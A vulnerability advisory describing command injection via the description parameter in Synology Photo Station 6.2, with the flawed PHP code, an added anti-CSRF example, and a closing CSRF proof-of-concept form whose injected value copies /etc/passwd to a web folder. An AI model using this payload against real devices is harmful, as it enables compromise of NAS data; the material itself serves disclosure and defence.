Abstract
A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver. An attacker can use this vulnerability to compromise a Synology DiskStation NAS, including all data stored on the NAS.
Tested version
This issue was tested on Synology Photo Station version 6.2-2858.
Fix
Synology reports that this issue has been resolved in Photo Station version 6.3-2945. https://www.synology.com/en-us/releaseNote/PhotoStation
Introduction
Synology Photo Station is an online photo album that is managed by DiskStation Manager (DSM). Synology NAS provides the home/photo folder for storing photos and videos that can be viewed via a web browser.
A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver (http).
Details
Photo Station calls other Synology applications (e.g., /usr/syno/bin/synophoto_dsm_user) using operating system commands. It was found that Photo Station does not properly sanitize user input and as a result attackers can inject their own system commands that will be executed by Photo Station. In particular, this issue can be exploited via the description POST parameter. The affected code is listed below:
public static function UpdateDescriptionMetadata($path, $description)
{
    //update metadata
    $cmd = sprintf('%s -M"set %s %s" -M"set %s %s" -M"set %s %s" -M"set %s %s" %s', SYNO_EXIFTOOL_FILE,
        "Xmp.dc.description", $description,
        "Xmp.photoshop.headline", $description,
        "Iptc.Application2.Caption", $description,
        "Exif.Image.ImageDescription", $description, escapeshellarg($path));
    @exec($cmd);
}
As can be observed, this code uses the value of the description parameter to construct an operating system command that is invoked using the exec() PHP function. Only $path is passed through escapeshellarg(); the user-supplied description is neither validated nor sanitized, rendering Photo Station vulnerable to command injection.
In addition, Photo Station does not protect against Cross-Site Request Forgery (CSRF) attacks. A remote attacker can abuse this and lure a victim into visiting a specially crafted web page to execute arbitrary commands with the privileges of the webserver (http user). As a result an attacker can compromise the targeted Synology NAS, including all stored data.
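The PHP below is an added example, not Photo Station's code, showing the kind of anti-CSRF check that would make the cross-site form post described above fail: a random per-session token that every state-changing webapi call (such as method=edit) must echo back, compared in constant time, plus a check of the Origin header when the browser sends one. The function names, parameter name and host name are assumptions for this illustration.

```php
<?php
// Added example (not Photo Station's code). Names are illustrative.
const CSRF_SESSION_KEY = 'csrf_token';
const CSRF_PARAM       = 'csrf_token';

// Issue (or reuse) a 256-bit random token bound to the user's session.
// The application embeds it in its own pages; a third-party page cannot
// read it, so it cannot include it in a forged form.
function csrfToken(array &$session): string
{
    if (empty($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

// Accept a state-changing request only if it is a POST, carries a token equal
// to the session's (compared with hash_equals to avoid timing leaks), and, when
// an Origin header is present, that origin is this NAS and not a foreign site.
function csrfCheck(array $session, array $post, array $server, string $ourHost): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    $given    = $post[CSRF_PARAM] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return false;
    }
    if (isset($server['HTTP_ORIGIN'])) {
        $origin = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        if ($origin !== $ourHost) {
            return false;
        }
    }
    return true;
}

// Constructed requests: an edit issued from the application's own page, and a
// form post of the shape used in the advisory, submitted from another site.
$session = [];
$token   = csrfToken($session);
$ourHost = 'nas.example.internal';

$common = [
    'id'          => 'photo_example',
    'api'         => 'SYNO.PhotoStation.Photo',
    'method'      => 'edit',
    'version'     => '1',
    'description' => 'Sunset',
];
$fromOwnPage  = $common + [CSRF_PARAM => $token];
$fromOtherSite = $common;  // no token: a foreign page cannot know it

$legitServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://nas.example.internal'];
$crossServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://other.example'];

var_dump(csrfCheck($session, $fromOwnPage, $legitServer, $ourHost));
var_dump(csrfCheck($session, $fromOtherSite, $crossServer, $ourHost));
var_dump(csrfCheck($session, $fromOwnPage, $crossServer, $ourHost));
```

The first call succeeds; the second fails because no token is present, and the third fails because the Origin header names a foreign host even though a valid token was supplied. In a real deployment the token check would run before any handler that reaches UpdateDescriptionMetadata(), and the session cookie would additionally be marked SameSite so that the browser does not attach it to cross-site form posts in the first place.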
Proof of concept
The following proof of concept copies the /etc/passwd file to /var/services/photo/Securify.txt.
<html>
  <body>
    <form action="http://<target>/photo/webapi/photo.php" method="POST">
      <input type="hidden" name="id" value="photo_536168696e_53637265656e2053686f7420323031352d30352d31302061742032322e33342e33352e706e67" />
      <input type="hidden" name="description" value="| cat /etc/passwd > /var/services/photo/Securify.txt " />
      <input type="hidden" name="api" value="SYNO.PhotoStation.Photo" />
      <input type="hidden" name="method" value="edit" />
      <input type="hidden" name="version" value="1" />
      <input type="hidden" name="ps_username" value="admin" />
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>